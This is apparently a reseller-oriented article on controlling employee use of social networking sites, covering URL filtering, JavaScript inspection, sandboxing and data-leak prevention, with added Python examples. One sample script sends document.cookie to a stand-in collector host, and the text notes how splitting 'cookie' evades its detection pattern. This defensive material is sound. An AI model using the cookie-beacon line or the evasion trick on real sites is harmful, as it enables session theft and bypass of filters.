Controlling anti-social networking – a guide to blocking employees’ access to Facebook, MySpace and more.

Right now, your customers’ employees are looking at Facebook and surfing MySpace. If that doesn’t worry their employers, it should.

Social networking has only gained popularity in the last three or four years, but it is generating the same concerns that instant messaging did at the start of the decade.

Viral marketing or virus?
Vulnerabilities and associated exploits are found on sites such as MySpace and Facebook with alarming regularity. Some rely on user naivety. One Facebook exploit, Koobface, relies on users following a link with an amusing title that offers a video download. The link takes them to a site instructing them to download ‘the latest version of Flash’ — which is actually a Trojan — in order to view the material. Similarly, MySpace has been targeted by malware writers who leave comments on users’ pages promising videos but telling people to download fake codecs first; on both sites these attacks frequently install worms. Phishing mails masquerading as friend notifications from Facebook carry an attached image that is actually a Trojan, and some of them lull suspicion by genuinely taking you to Facebook. Potentially more dangerous are exploits which require practically no action on the user’s part, save for visiting the site. It takes just five friends and an application form to become ‘a Facebook application developer’, and proof-of-concept malware has already been developed.

But most of your clients won’t be worrying about the danger of having their network taken over, although they may be calling you in to deal with virus attacks more often. They’re more likely to be concerned about the productivity and liability problems of having their employees using Facebook and MySpace indiscriminately. The temptation to ‘just log on for a quick look’ is second only to the temptation to stay.

Facebook in particular is a rat’s nest of status updates, social applications and conversational opportunities, and can suck in well-meaning employees who suddenly forget how long a lunch break is supposed to be.

The liability associated with ill-advised posts is also a problem. Inappropriate jokes posted from a client’s IP address could potentially backfire, but the potential for intellectual property violation is even worse. The terms and conditions on some Web sites are long, and increasingly draconian. Few if any of your clients will have read them, but security experts worry that those terms and conditions could taint a company that lets employees post information, in just the same way as adware T&Cs often taint users by providing unfettered access to everything from private surfing information through to a user’s machine.

Anti-social setup
Such concerns lead to the basic question: to block, or not to block? One obvious choice is to block everything vaguely social. In practice, you might find that this affects morale among your clients’ staff (although with the economy in its current state, reduced access is unlikely to be the last straw for anyone — who’s going to leave at this point?). Some people are also using social networking applications for valid work reasons. Practices such as networking with colleagues in other companies, and joining groups relating to work-based interests, are on the rise.

Use Web security gateways to easily apply access policies to a client’s whole employee base. Look for features such as URL filtering, content inspection and malware detection in these appliances, which are designed to be easily deployed and centrally managed. But unlike some other sites, it’s difficult for URL filtering to be granular on many social networking sites. You might block, say, the sports section of the BBC Web site while leaving the financial news intact. But the domain structure on sites like Facebook makes it difficult to block, say, specific sub-applications – especially as these services use AJAX technology to make Web pages more dynamic.

Even if you don’t want to choke off social network sites completely for all users, URL filtering has its benefits. Secure Computing’s Webwasher product lets administrators restrict URLs based on the identity of the person accessing them, for example. Access can be restricted according to groups in an LDAP-compatible directory such as Active Directory (maybe your clients’ HR department wants to access LinkedIn to check up on job applicants, but the board doesn’t want anyone else to surf there). Other features include the ability to allow access to sites only at certain times, such as weekends. System admins using the Webwasher appliance can also set manual override options that let users enter login credentials and get access to a site for an amount of time predetermined by the administrator.

The problem with social networking sites is that users want to get there – often quite badly. People may decide to subvert network protection measures to do so, if they feel that their right to Internet access is being unfairly denied. Anonymous proxies are a way for users to punch out to these sites without alerting gateway proxies to their destination. Products including Sophos’s Web Security and Control appliance, and Secure Computing’s Webwasher, can spot and stop anonymous proxy use. These appliances keep an ever-growing list of anonymous proxies, as exchanged on message boards and other online hangouts.
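The three policy ingredients described above (a per-site rule, a directory group that is allowed through, and a time window) can be expressed as a small decision function. The Python below is an added illustration written for this article, not code from Webwasher or any other product named here; the user directory, the rules, and the anonymous-proxy list are constructed sample data standing in for an LDAP lookup and a vendor-maintained feed.

```python
from dataclasses import dataclass, field
from datetime import datetime, time
from urllib.parse import urlsplit

# Constructed sample directory: user -> groups, standing in for LDAP/Active Directory lookups.
USER_GROUPS = {
    "alice": {"hr"},
    "bob": {"engineering"},
    "carol": {"board"},
}

# Constructed stand-in for a vendor's remotely updated list of anonymising proxies.
ANONYMOUS_PROXIES = {"anon-proxy.example", "hide-me.example"}


@dataclass
class Rule:
    domain: str                                        # matches the host and all its subdomains
    allow_groups: set = field(default_factory=set)     # groups that may visit; empty means nobody
    allow_windows: list = field(default_factory=list)  # (weekdays, start, end); empty means any time


def host_matches(host, domain):
    return host == domain or host.endswith("." + domain)


def in_window(when, windows):
    if not windows:
        return True
    return any(when.weekday() in days and start <= when.time() <= end
               for days, start, end in windows)


# Constructed policy: HR may research applicants on LinkedIn at any time;
# everyone in a listed group may use Facebook, but only at weekends (Sat=5, Sun=6).
RULES = [
    Rule("linkedin.com", allow_groups={"hr"}),
    Rule("facebook.com", allow_groups={"hr", "engineering", "board"},
         allow_windows=[({5, 6}, time(0, 0), time(23, 59))]),
]


def decide(user, url, when):
    """Return (decision, reason) for one request; the first matching rule wins."""
    host = (urlsplit(url).hostname or "").lower()
    # Anonymisers are refused for everyone: their purpose is to bypass this very check.
    if any(host_matches(host, p) for p in ANONYMOUS_PROXIES):
        return "block", "anonymous proxy"
    for rule in RULES:
        if not host_matches(host, rule.domain):
            continue
        if not USER_GROUPS.get(user, set()) & rule.allow_groups:
            return "block", f"{rule.domain}: group not permitted"
        if not in_window(when, rule.allow_windows):
            return "block", f"{rule.domain}: outside permitted hours"
        return "allow", f"{rule.domain}: permitted"
    return "allow", "no rule for this host"


# Constructed requests: 2009-03-10 is a Tuesday, 2009-03-14 a Saturday.
SAMPLE_REQUESTS = [
    ("alice", "https://www.linkedin.com/in/someone", datetime(2009, 3, 10, 10, 0)),
    ("bob", "https://www.linkedin.com/in/someone", datetime(2009, 3, 10, 10, 0)),
    ("bob", "https://www.facebook.com/home.php", datetime(2009, 3, 10, 12, 30)),
    ("bob", "https://www.facebook.com/home.php", datetime(2009, 3, 14, 12, 30)),
    ("carol", "http://anon-proxy.example/browse?u=facebook.com", datetime(2009, 3, 10, 9, 0)),
    ("dave", "https://news.example/", datetime(2009, 3, 10, 9, 0)),
]


def run_samples():
    return [decide(user, url, when) for user, url, when in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (user, url, _), result in zip(SAMPLE_REQUESTS, run_samples()):
        print(user, url, *result)
```

Two points of the design matter in practice: the anonymiser check runs before any site rule, since a permitted user reaching a blocked site through a proxy would otherwise be judged on the proxy's hostname rather than the real destination; and the group check is evaluated before the time window, so the reason string tells the administrator which half of the policy refused the request.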

URL filtering can also stop some malware delivery vectors. The use of IFRAME and IMG tags to point to malicious content on other sites means that browsers will make GET requests to those other domains. URL filtering services can be programmed with blacklists, but the best ones maintain a remotely updated list of known offenders, so that when an innocent visit to a social network page prompts a GET request to a Chinese malware server, the user will stand a better chance of being protected.
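The check a gateway performs on that page content, as an added example for this article rather than any vendor's code: parse the HTML in transit, pull out the tags that make the browser fetch on its own (IFRAME, IMG and SCRIPT src attributes), discard references to the page's own domain, and compare the rest against a blocklist. The sample page, the page domain and the blocklist are constructed; a real deployment would replace the blocklist with the vendor's updated feed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed stand-in for the remotely updated list of known-bad hosts a
# commercial gateway would pull from its vendor.
BLOCKLIST = {"malware.example", "bad-cdn.example"}

# Constructed sample: a profile page into which someone has inserted a hidden off-site frame.
SAMPLE_PAGE = """
<html><body>
<img src="/photos/me.jpg" alt="me">
<img src="https://cdn.social.example/badges/gold.png">
<iframe src="http://malware.example/drop.html" width="0" height="0"></iframe>
<script src="https://social.example/js/app.js"></script>
</body></html>
"""


class RemoteRefExtractor(HTMLParser):
    """Collect src attributes of tags that make the browser issue a GET on its own."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "img", "script"):
            for name, value in attrs:
                if name == "src" and value:
                    self.refs.append((tag, value))


def _under(host, domain):
    return host == domain or host.endswith("." + domain)


def third_party_refs(html, page_host):
    """Return (tag, host) for every embedded reference that leaves the page's own domain."""
    parser = RemoteRefExtractor()
    parser.feed(html)
    out = []
    for tag, src in parser.refs:
        host = urlsplit(src).hostname
        if host is None or _under(host.lower(), page_host):
            continue  # relative reference or same-site subdomain
        out.append((tag, host.lower()))
    return out


def blocked_refs(html, page_host, blocklist=BLOCKLIST):
    """Subset of third-party references whose host is on the blocklist."""
    return [(tag, host) for tag, host in third_party_refs(html, page_host)
            if any(_under(host, bad) for bad in blocklist)]


if __name__ == "__main__":
    print("third-party:", third_party_refs(SAMPLE_PAGE, "social.example"))
    print("blocked:", blocked_refs(SAMPLE_PAGE, "social.example"))
```

Logging the full third-party list, not only the blocked subset, is worth doing: a social network profile that suddenly starts pulling frames from a domain nobody has heard of is exactly the signal that gets a host onto tomorrow's blocklist.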

Coping with JavaScript
JavaScript has become the predominant means of delivering Web-based malware, because it executes on the client. Depending on the browser’s vulnerabilities, it can be used to steal cookies, create file system objects and manipulate browsers into submitting requests to other sites.

Gateway appliances like Finjan’s Vital Security NG-5100 and models from Secure Computing inspect the JavaScript in the Web page during transit. However, such inspection has become more difficult to do. JavaScript-based attacks are now being obfuscated, using on-the-fly techniques that change key attributes of the source code, such as variable names, each time they are downloaded. The result is that straightforward signature matching is becoming increasingly ineffectual. Consequently, Finjan, Secure Computing and others use behavioural analysis, looking at the JavaScript’s structure to work out what it is trying to do. If any red flags are raised, the appliance will automatically block the code.


Secure Computing’s Webwasher product has a granular behavioural analysis system. The configuration screen includes a variety of behaviours that an administrator can look for in mobile code including JavaScript and VBScript. Policies can be set for behaviours including read and write access to files and to the system registry, and access to the network. Administrators can also remove snippets of code relating to particular behaviours while letting the majority of the code through.
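The difference between signature matching and behavioural analysis, and the ‘remove only the offending snippet’ option just described, can be shown with a few lines of Python. This is an added example for this article, not the analysis engine of Webwasher, Finjan or any other product: the behaviour categories are simple regular expressions I chose to mirror the file, registry, network and cookie policies above, and the three scripts are constructed samples. Script A and script B do the same thing; B has had its variable renamed and its whitespace changed, which is enough to defeat an exact signature but not the behavioural check.

```python
import hashlib
import re

# Behaviour categories in the spirit of the file, registry and network policies
# described above. Each pattern keys on what the script does, not on its exact bytes.
BEHAVIOURS = {
    "cookie_read":    re.compile(r"document\s*\.\s*cookie"),
    "file_system":    re.compile(r"ActiveXObject\s*\(\s*['\"]Scripting\.FileSystemObject['\"]"),
    "registry":       re.compile(r"\.Reg(Write|Read|Delete)\s*\("),
    "dynamic_eval":   re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "network_beacon": re.compile(r"new\s+Image\s*\(\s*\)\s*\.\s*src\s*=|XMLHttpRequest"),
}

# Constructed samples. A and B behave identically; B is A after a variable rename and
# whitespace change, the sort of per-download rewrite that defeats exact signatures.
SCRIPT_A = 'var c = document.cookie;\nnew Image().src = "http://collector.example/?c=" + c;\n'
SCRIPT_B = 'var zq1=document.cookie;\nnew Image().src="http://collector.example/?c="+zq1;\n'
SCRIPT_BENIGN = 'document.getElementById("greeting").innerHTML = "Hello";\n'


def signature(script):
    """Exact-match signature: any change to the text gives a different value."""
    return hashlib.sha256(script.encode()).hexdigest()


def behaviours(script):
    """Set of behaviour categories the script exhibits."""
    return {name for name, pat in BEHAVIOURS.items() if pat.search(script)}


def evaluate(script, blocked):
    """Apply an administrator's policy (set of behaviour names to block)."""
    flagged = behaviours(script) & set(blocked)
    return ("block" if flagged else "allow"), flagged


def strip_flagged(script, blocked):
    """Remove only the statements carrying a blocked behaviour and pass the rest through.
    Assumes one statement per line, which holds for the constructed samples."""
    kept = [line for line in script.splitlines()
            if not any(BEHAVIOURS[b].search(line) for b in blocked)]
    return "\n".join(kept) + ("\n" if kept else "")


if __name__ == "__main__":
    print("same signature:", signature(SCRIPT_A) == signature(SCRIPT_B))
    print("same behaviours:", behaviours(SCRIPT_A) == behaviours(SCRIPT_B), behaviours(SCRIPT_A))
    print(evaluate(SCRIPT_A, {"cookie_read", "file_system"}))
    print(evaluate(SCRIPT_BENIGN, {"cookie_read", "file_system"}))
    print(repr(strip_flagged(SCRIPT_A, {"network_beacon"})))
```

The caveat a practitioner would raise is that regular expressions over source text are only the first rung of behavioural analysis: a script that builds the property name from pieces (`document["coo" + "kie"]`) slips past the `cookie_read` pattern, which is why the commercial engines parse the script into a structure and, in some cases, run it in an emulator before deciding.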

This is vastly preferable to desktop alternatives such as NoScript, the Firefox plug-in that simply stops all JavaScript from running, regardless of what it is trying to do. That system, which uses a whitelist to only allow JavaScript from certain sites to run, now suffers from the same problem as many other whitelisting technologies — many legitimate sites have been infected with malicious scripts using SQL injection attacks.

Virtually secure
To further lock down the malware dangers inherent in social networking, you might consider virtualisation. Virtualising a user’s social network session means any JavaScript executed during the session only affects the virtual platform. Internet Explorer 7 on Vista runs in a low-rights ‘protected mode’: process tokens are given a low integrity level and are prevented from writing to processes with a higher integrity level, which stops exploits from installing anything without explicit permission from the user. It’s worth mentioning this protection if you’re discussing Windows upgrades.

Internet Explorer 8 and Google’s new Chrome browser run in multiple processes to improve security and Chrome promises more security with each browser tab in a separate process (IE8 only does this after a tab has crashed and been reloaded). Chrome also has a sandboxed environment that uses the process token feature in both Vista and XP to apply a token to each instance of the rendering engine, restricting that rendering engine’s access to system-level resources through Windows security.

Again, on Vista, Chrome uses protected mode so the token for each browser tab stops it writing to a process with a higher integrity level. When the new browsers mature, you can use Group Policy to stipulate your preferred browser, but that’s not advisable while they’re still in beta and alpha release respectively.

An alternative is to virtualise existing browsers. Altiris (now owned by Symantec) offers Software Virtualisation Solution (SVS), which inserts a ‘shim’ between the operating system and installed applications. Apps write to a virtual registry and file system, protecting the underlying operating system from unauthorised changes. If and when a browser is compromised by malware delivered via a social networking system, it can simply be reset, either by the user or from a central console, and it is removed from the system and refreshed with a new copy.

Layers of security
With SVS, you put the management server at your location and remotely manage your clients’ desktops. Operating an appliance remotely is similarly easy. Configure the rules on the router in the client’s office to point to the gateway Web security appliance in your office as a proxy. The appliance filters incoming Web traffic before it reaches your client’s router, essentially turning your office into a demilitarised zone (DMZ) for your clients.

However, filtering for different clients’ domains on a single appliance may be more difficult, depending on the appliance you’re using. The main problem is the routing of the traffic. Astaro, which offers the Astaro Web Gateway Web filtering system, allows support of distant subnets. The quick and easy way to support multiple subnets on the same box is to set up a VPN between the appliance and each office. However, that would still need low-end boxes at the customer site to act as VPN endpoints.

In many cases, such deployments are not officially supported. The Sophos appliance is a 1U rack system specifically designed for on-site deployment, for example. Technically, it could be deployed at a central remote site but the company would have to negotiate a new licensing scheme for it, and traffic routing would need to be managed carefully to avoid different clients seeing each other’s packets. If budgets allow, you can install an appliance at each customer site, and manage them remotely; Astaro offers a free management tool, Command Center. A more elegant solution might be to use a virtual appliance for each customer, many of which can be deployed on the same server. This would solve the routing problem altogether, and make central management easier. Astaro’s Web security gateway can be installed in this way, using VMware as a platform. It is licensed by the number of users.

Central blocking of all clients using an appliance at the network gateway may stop embedded Web page and application attacks, but with social network exploits constantly evolving, it becomes difficult to guarantee protection. Using a gateway may work for people in the office, but unless you can force laptop users to connect via your proxy when they’re using the machine at home on the weekend, it won’t provide total protection. It is possible to use Group Policy settings in Windows Server 2003 to remove the Connections tab on the endpoint, which would effectively enforce predefined proxy settings and point the laptop at a chosen proxy server wherever it is.

A defence-in-depth approach, in which you apply layered security measures at various points in the network, is the best method of protection. Critical Software, which provides a Web security gateway called iCritical, scans for malware at the gateway. All reputable Web security gateway vendors do (and Gartner has stipulated URL filtering, malware protection and content inspection as basic requirements of any such product). Nevertheless, Critical Software also recommends installing the NOD32 Anti-virus product, from Eset, on the desktop. Like many antivirus products today, it uses heuristic analysis rather than simply relying on signature-based scans to protect the endpoint.

Secure your relationship
Another option for monitoring incoming Web traffic is to use the growing number of cloud-based Web filtering services, eliminating the need for capital expenses on equipment and protecting remote users too. These are often available through the channel, with the requisite margins. Websense, like Critical Software and MessageLabs, offers an on-demand service. The company sells Websense Hosted Web Security on a per-seat, per-year basis through channel partners.

The danger here is that small businesses will simply opt for a direct relationship with vendors who offer security as a service. The way around that is to sell social network management as part of a holistic security strategy, focusing equally on the need for outbound information control as well as incoming filtering. Web security filters are largely focused on incoming content analysis, but businesses may want to stop unauthorised information being posted to Web sites using tools for endpoint data leak prevention. McAfee’s Total Protection for Data product can be programmed to recognise when data from a confidential document is copied to the clipboard, making it impossible for clients to post that information to their Facebook pages, for example, and Trend Micro has a similar tool.

Facetime, which sells the Unified Security Gateway, emphasises the two-way nature of the system. The basic box filters incoming traffic, but it is possible to include sidecar modules that impose data leak prevention measures on outgoing information. These use PreciseID, a technology which allows administrators to ‘fingerprint’ documents and use fuzzy matching, going beyond simple keyword definitions.
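Document fingerprinting with fuzzy matching, of the kind PreciseID is described as offering, works by registering hashed word n-grams (‘shingles’) of each confidential document and scoring outbound text by how many of its own shingles appear in a registered document. The Python below is an added example written for this article; it is not PreciseID or any FaceTime code, and the confidential document and the two outbound posts are constructed. The shingle length K and the 0.2 threshold are my choices, not vendor defaults.

```python
import hashlib
import re

K = 5  # shingle length in tokens; smaller catches shorter fragments but raises false matches


def tokens(text):
    """Case-fold and drop punctuation so light edits to a copied passage still line up."""
    return re.findall(r"[a-z0-9]+", text.lower())


def shingles(text, k=K):
    """Hashed word k-grams. Only the hashes are kept, so the fingerprint store
    does not itself contain the confidential text."""
    toks = tokens(text)
    return {hashlib.sha1(" ".join(toks[i:i + k]).encode()).hexdigest()[:16]
            for i in range(len(toks) - k + 1)}


class FingerprintStore:
    def __init__(self):
        self.docs = {}

    def register(self, name, text):
        self.docs[name] = shingles(text)

    def match(self, outbound, threshold=0.2):
        """Return {doc: score} for registered documents the outbound text appears to be
        lifted from. Score is the fraction of the outbound text's shingles found in the
        document, so a short post copied from a long document still scores highly."""
        out = shingles(outbound)
        if not out:
            return {}
        hits = {}
        for name, fp in self.docs.items():
            score = len(fp & out) / len(out)
            if score >= threshold:
                hits[name] = round(score, 2)
        return hits


# Constructed sample: one confidential document and two outbound posts.
CONFIDENTIAL = (
    "CONFIDENTIAL. Project Falcon quarterly forecast. Revenue is expected to reach "
    "4.2 million in Q3, driven by the new gateway appliance line. Headcount will grow "
    "by twelve engineers before the end of the year."
)
LEAKY_POST = ("Heard that revenue is expected to reach 4.2 million in Q3, "
              "driven by the new gateway appliance line!")
BENIGN_POST = "Lunch at the new place on the corner was great, recommend the soup"

STORE = FingerprintStore()
STORE.register("falcon-forecast", CONFIDENTIAL)

if __name__ == "__main__":
    print(STORE.match(LEAKY_POST))   # high score: 13 of the post's 15 shingles are in the document
    print(STORE.match(BENIGN_POST))  # {}: nothing in common at 5-word granularity
```

The reason this beats keyword lists is visible in the leaky post: no single word is unusual, and the punctuation and capitalisation differ from the source, yet thirteen of its fifteen five-word shingles come straight from the document. The trade-off is that anything shorter than K tokens can never match, so the shingle length is a policy decision about how small a fragment is worth stopping.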

It nevertheless gets difficult to block everything inappropriate that a user might want to post. This comes down to basic common sense. Putting something in the employee handbook explaining what constitutes sensible use of a social networking system (or indeed any electronic communications mechanism) is a must, and will also protect your clients from liability issues down the line. Using appliances such as FaceTime’s, which provide the option to display end-user disclaimers, can help strengthen your clients’ legal position by proving that they’re taking active steps to remind users of what they should and shouldn’t post online.

Ultimately, protecting your clients against the dangers of social networking comes down to a mixture of judiciously applied technology and common sense. The need for user education shouldn’t be underestimated, and a training course for your clients can be justified on both legal liability and security grounds. Using a combination of these tools should help you protect your clients and make a healthy margin into the bargain.

WorkLight WorkBook

Blocking Facebook altogether can be just as counterproductive in productivity and morale terms as leaving it on. WorkLight, which sells technologies designed to make in-house applications available through social media channels, has tried to find a compromise. Its WorkBook product makes an internal collaboration application available through the Facebook interface, without exposing that information to Facebook or its other users.

The product is accessed like any other Facebook application, but it is run behind a firewall and hosted by the user (or, perhaps in this case, your company, on their behalf). That means that the application is safe (although you couldn’t say that for the rest of Facebook).

Once logged in, your clients can see a news feed highlighting activities and comments from the rest of their team. The Time Report function is a feature of the WorkBook application, and the groups are also hosted on the WorkBook server, rather than by Facebook itself. Only colleagues get to see information pertaining to the team.

Users join internally hosted groups for team discussions. This makes it possible for your clients to conduct private, sensitive discussions without worrying about Facebook’s privacy issues.

Updating your profile in this application stores the information on the WorkLight server, so that Facebook users don’t get to see it.

Key Links

‘Satan is on my Friends List’ talk from BlackHat 2008.

Using social networking attacks to compromise a client and co-opt it into a botnet.

Astaro Web Gateway

Software Virtualisation Solution Professional

McAfee Total Protection for Data

Worklight WorkBook

Unified Security Gateway

Secure Computing Webwasher

Sophos Web Security and Control

Discussion of social network attacks using password resets

Design document for Chromium sandbox

Discussion of sandbox security in Google Chrome browser

Explanation of protected mode and integrity levels in Windows Vista

List of social networking applications in FaceTime’s ‘Greynets Guide’


Comments (1)
Posted: Sep, 26 2010

Time Doctor

Want to block your employees from using Facebook at work?

This application uses a better method than blocking Facebook because it just monitors Facebook during work hours. Team members can use Facebook on lunch breaks. Also some people might need Facebook for work purposes so it's stupid to just block it.


